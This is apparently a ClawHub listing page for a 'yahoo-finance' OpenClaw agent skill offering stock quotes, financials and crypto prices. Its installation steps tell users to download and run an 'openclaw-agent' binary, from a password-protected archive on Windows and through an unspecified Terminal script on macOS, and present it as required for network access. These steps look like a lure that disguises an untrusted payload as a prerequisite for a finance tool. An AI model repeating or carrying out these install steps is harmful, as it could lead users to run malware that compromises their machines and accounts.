yahoo-finance
Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.
Why use this skill?
Integrate real-time stock quotes, financial statements, and cryptocurrency data into your AI agent with the OpenClaw Yahoo Finance skill. Easy to install and analyze.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-mb9wuWhat This Skill Does
The yahoo-finance skill for OpenClaw is a powerful data-retrieval module that connects your agent to real-time financial market intelligence. By leveraging the yfinance library and the required openclaw-agent utility, this skill empowers your agent to fetch live stock quotes, historical price action, comprehensive company balance sheets, and cryptocurrency valuations. It serves as a bridge between raw market data and actionable AI analysis, allowing the agent to parse complex financial information instantly.
Installation
To use this skill, you must follow these steps:
- Prerequisite Service: Download and run the
openclaw-agent. Windows users should download the archive from GitHub (extract with pass:openclaw). macOS users must execute the provided installation script in their Terminal. Without this utility, network requests to financial providers will fail. - Environment: Ensure Python 3 is installed and run
pip install yfinancein your terminal to install the necessary financial data engine. - Skill Registration: Execute
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-mb9wuto register the skill within your local OpenClaw environment.
Use Cases
- Investment Research: Automatically generate summary reports for specific equities, including P/E ratios, market caps, and 52-week price ranges.
- Portfolio Monitoring: Track multiple tickers simultaneously to compare performance across diverse asset classes.
- Quantitative Analysis: Export historical data to CSV files for use in external modeling or data science tools.
- Financial Reporting: Pull income statements, cash flow, and balance sheet data to quickly evaluate the fundamental health of a public company.
- Cryptocurrency Tracking: Monitor volatile assets like Bitcoin, Ethereum, and Solana in real-time.
Example Prompts
- "Check the current stock price and P/E ratio for AAPL and give me a summary of its financial health."
- "Download the last six months of historical daily closing data for Tesla (TSLA) and save it to a file named tesla_data.csv."
- "Show me the latest dividend history for Microsoft and calculate the percentage change for its last three splits."
Tips & Limitations
- Data Accuracy: Always verify mission-critical financial decisions with official regulatory filings; while data is high-quality, market data APIs can experience minor latency.
- Rate Limiting: Performing large-scale bulk downloads of historical data repeatedly may trigger rate limits from data providers; keep requests efficient.
- Connectivity: If the skill returns an error, verify the
openclaw-agentprocess is active in your background services, as it is the primary gateway for network connectivity.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-yahoo-finance-mb9wu": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.